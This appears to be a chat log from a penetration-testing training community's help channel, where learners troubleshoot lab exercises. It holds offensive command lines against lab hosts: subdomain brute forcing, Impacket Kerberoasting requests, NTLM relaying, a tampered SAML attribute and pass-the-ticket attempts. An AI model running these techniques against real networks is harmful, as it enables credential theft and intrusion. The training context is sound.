for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
I've been having issues accessing the targets as well
python3 /opt/impacket/examples/GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request just for fun and same issue
it's working for me now
did you try ntpdate
thanks..let me try that
ntpdate command not found on attack server, same with sudo
I can't even ping the target damn
thats why then
try ping 10.10.14.1
LOL refresh your page and see if your target has expired
weird GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
I'm not new to HTB, I'm aware of this. Even with a fresh target, I've just been having issues today
fs fs
ok
Not sure how to post screenshots and won't post the entire output as text because it's too big, but same issue with this command
probably just going to hang it up on this module tonight and try it again later
Thanks for the offers to help
How can I solve this problem? The VPN was working for me an hour ago, but it did not work
Restart VM
Read #welcome and register your account. As far as your issue goes are you by chance on US3 for the VPN.
not work
what is that ??
i made a pdf so i don't have to type it 80 times a day
hahah nice
But this is not my problem
my prob in vpn
the guide covers that at step 5
hh ok
well ns.inlanefreight.htb isn't in your /etc/hosts
try with the actual IP of the host
still stuck.... 😦
How can someone help you if they don't know exactly what you're working on?
The Academy now has 102 modules. Each module has several sections.
Without precise information about which module in which section and which question you are currently working on, it is impossible to offer you help
Am I understanding something wrong? In the new module "DACL Attacks II" and section Logon Scripts module tells to RDP with julios credentials, but I just get wrong username/password. There is no spawn machine button in that section so I expect that we should use the machine from previous section Shadow Credentials. So basically I'm stuck now because credentials are not working.
This is from section Logon Scripts questions.
Bloodhound tells that there is no user called "julio" in the lab spawned from previous section.
Hi, I am doing the first exercise of Attacking SQL Databases section of "ATTACKING COMMON SERVICES" module. I have got the NTLMv2-SSP Hash of the mssqlsvc user. But when I try to crack the hash using hashcat mode 5600, it doesn't do anything. Now, I am trying to use impacket-ntlmrelayx to execute commands on the target server itself. I get the connection to the SMB server on my attackbox, but then the error pops up and the command doesn't get executed:
[*] SMBD-Thread-5: Received connection from 10.129.25.56, attacking target smb://10.129.25.56
[-] SMBClient error: Connection was reset
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket/smbserver.py", line 4441, in processRequest
respCommands, respPackets, errorCode = self.__smb2Commands[smb2.SMB2_NEGOTIATE](
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 158, in SmbNegotiate
connData['EncryptionKey'] = client.getStandardSecurityChallenge()
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/clients/smbrelayclient.py", line 603, in getStandardSecurityChallenge
if self.session.getDialect() == SMB_DIALECT:
File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 206, in getDialect
return self._SMBConnection.getDialect()
AttributeError: 'int' object has no attribute 'getDialect'
For simplicity, I am just executing whoami command using the -c flag. But cannot get the output. What am I doing wrong?
Hi - Im working through Introduction to Windows Evasion Techniques. im having issue with the crypter in the static section, specifically wondering what data i enter into cyberchef? (do i include the starting variables, or just the shellcode separated by commas?) please @ and/or DM me if you can help!!!
im not able to get the flag to generate, figure its the Loader code, probably the aes stuff not properly decoding
Never mind hashcat cracked it 🙂
instead of flaming around you just could have jumped back. I wrote a detailed question... 😕
Hi everyone... i'm stuck in
"Signature Exclusion Attack"
Every time when I change the value of htb-stdnt to:
<saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
I'm getting this error:
<b>Warning</b>: DOMDocument::loadXML(): Start tag expected, '<' not found in Entity, line: 1 in <b>/var/www/sp/vendor/onelogin/php-saml/src/Saml2/Utils.php</b> on line <b>87</b><br />
Something went wrong.
Even by just changing one single attribute value. How could a '<' vanish in the process? Any ideas?
Again, what module is it
Please take a look at my printscreen.
#modules message
When I enter Signature Exclusion Attack in the search, the Academy finds nothing.
Perhaps #1234357888114364508
OK, sorry for that...
it's
#module Attacking Authentication Mechanisms
Signature Exclusion Attack
I just wrote down that I did the attack exactly as described in the module. However, the module has been changed in the meantime. The section was then called "No Signature Verification"
I only changed the mail address and encoded it again with base64
Can someone help with medium lab on module "network enumeration with nmap"? I try to get dns-nsid of dns server but script is giving me "dns.query() failed to resolve the requested query: version.bind"
Try it from the PwnBox
Apologies for this. I will fix it now.
Feel free to DM me with your exact payload and I'll look into it
@snow ridge The section now contains the VM you should spawn.
Thanks!
switch vpns
Do I still need proxychains if I am using ligolo?
Can i know what msf options you used to exploit? I am unable to get any results from msfconsole
Hello, I am working on the hard skills assessment of the footprinting module, and I am stuck for days. I have the feeling that I tried everything possible, and I have no idea where to look for now. I do not want the answer, but I would be interested by a little nudge to help me continue this assessment. Could someone give me a little hint? Thanks.
"The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag. "
I removed the disabled flag but when I click on the button , nothing happens(even though the button changes).
Module: ATTACKING COMMON APPLICATIONS
Chapter: Exploiting Web Vulnerabilities in Thick-Client Applications
Question: What is the IP address of the eth0 interface under the ServerStatus -> Ipconfig tab in the fatty-client application?
Issue: After rebuilding and running the fatty-client-new.jar when I attempt to login the fatty-client-new.jar program freezes. It freezes with the provided credentials and fake creds. I have tried building the new file from a normal and admin powershell. Packet captures show the client and server initiating a connection but then nothing else happens. I also rebuilt the lab three times.
please @me if you can help.
What you tried? You got any interesting services? Not yet?
Hello could anyone help me with the Skill Assessment on Intro to Whitebox Pentesting? Pm me 🙂
ye dont work for me either
yep I used the inbuilt browser VM for now. works fine for today ig
for the ad attacks module, do i need to install dotnet on the target host
idr doing that
academy eu-2 UDP working for me
I logged out wasn't working atm. Thanks
Don't think so
why is it using that and not my vpn ip
msfc isn't listening on the correct interface
ok thank u
If you dont specify it. Msf doesnt know on which interface he should listen
I forgot where it is off the top of my head but there is a msf config so you can set lhost to always be tun0
I also tried clicking on this button multiple times ...hoping that the message will appear.
Msf defaults to the highest interface
You gotta click it a bunch
Does anyone have a link or something, for attacking sql prepared statements? i can't exploit the CALL function(input);
I clicked it like 20 times
Well yea i meant it more like "msf doesnt know if you want it on tun0 or anyother interface", you need to specify if you dont want the "default"
now that im in the target shell how do i find a file called flag.txt
cuz ls doesnt work on windows
type C:\Users\Administrator\Desktop\flag.txt
it doesnt go to that directory why
like it does in linux
type == cat
its fine i just did type C:/user...
you didn't cd, you'd also need to cd on linux
I suggest you take the module on Tier 1
Right now the current directory is system32
Intro to windows is a t0
no intro to windows to command line
Is it?
Huh
how many times did you click it before you generated a result? I clicked it more than 12 times. I caught the intercept, then send it to a response body text and after I altered the web content I then forwarded the altered web content. I did not use the repeater
.
I didn't do any intercept
I just clicked until it worked
hello guys does the skill assessment-part-1 in Active Directory enumeration rely on responder capturing a service account hash or is it just getting a list of username and password spraying ? can someone point me in the right direction
Both skill assessments rely on enumeration tactics
Password spraying involves using 1 password
Think of basic passwords that would adhere to basic Complexity rules
yes but should I get something back from responder ?
Responder won't find anything until it's talked to, and that can take a min
hey everyone! I'm having an issue with an exercise from the "Pass the Ticket (PtT) from Linux" session from the Password Attacks module. I'm with root access in the LINUX01 machine, and I'm importing the tickets available in the /tmp folder. However, when I try to run smbclient //dc01/julio -k -c ls -no-pass, I get an error using all the available ccache files. Can someone help? I have tried respawning the machine at least 4 times, and also changed the VPN region.
If you feel it's taking too long try other methods
any tip, how to bypass prepared statements? i try to do the challenge stored procedure in OWASP SHEPHERD but i really can't
@dim wolf can i talk to you in private ?
I have $42 in my HTB academy balance account and I want to get a subscription of platinum which is $68.
when I start subscribing, my billing shows that I have to pay $68 from my credit card
But I want to use my $42 balance and remaining $26 from my credit card.
How can I do this?
Wrong channel
Message support
okay
where should i write?
Well if it's a challenge on HTB #challenges otherwise #1024429874246590575 or maybe #web
I'm doing Attacking Enterprise Network: Exploitation & Privilege Escalation. I've reset the target and Pwnbox multiple times, but whenever I get the ssh connection to the first box as root it is instantly dropping connection. "Channel 4: open failed: connect failed: Connection timed out." Proxychains.conf has been edited. I've tried different ports socks4 and socks5. Is there an explanation for this drop of connection when using SSH port forwarding? I wasn't having this issue last night, but I am this morning.
Double check your ticket has not expired.
Back!
both the tickets from user julio have expired (as I show in the image), but when I respawn the machine they show up already expired every time. What should I do?
renew it?
So I'm on 'Kerberoasting - from Linux' in the 'Active Directory Enumeration & Attacks' module...continuing to get "[Errno 104] Connection reset by peer"
Impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
Having no issues Listing SPN Accounts, but adding in the -request above doesn't render one TGS Ticket due to the connection reset by peer error. Any suggestions, as that is the exact command listed in the solution?
Principal: INLANEFREIGHT.LOCAL\SAPService - [Errno 104] Connection reset by peer
I don't know if that is possible, considering that those are ccache files that I understand are created when the actual user logs in. Since I am not the actual user (julio) and don't have their password, I don't see a way of renewing the ccache files
there should be tickets that are not expired somewhere
switch vpn servers
Already done that
eu2 works
the /tmp folder is where they should be, according to the solution shown in the module
lol ok I'll switch to EU2 and hope that is the problem

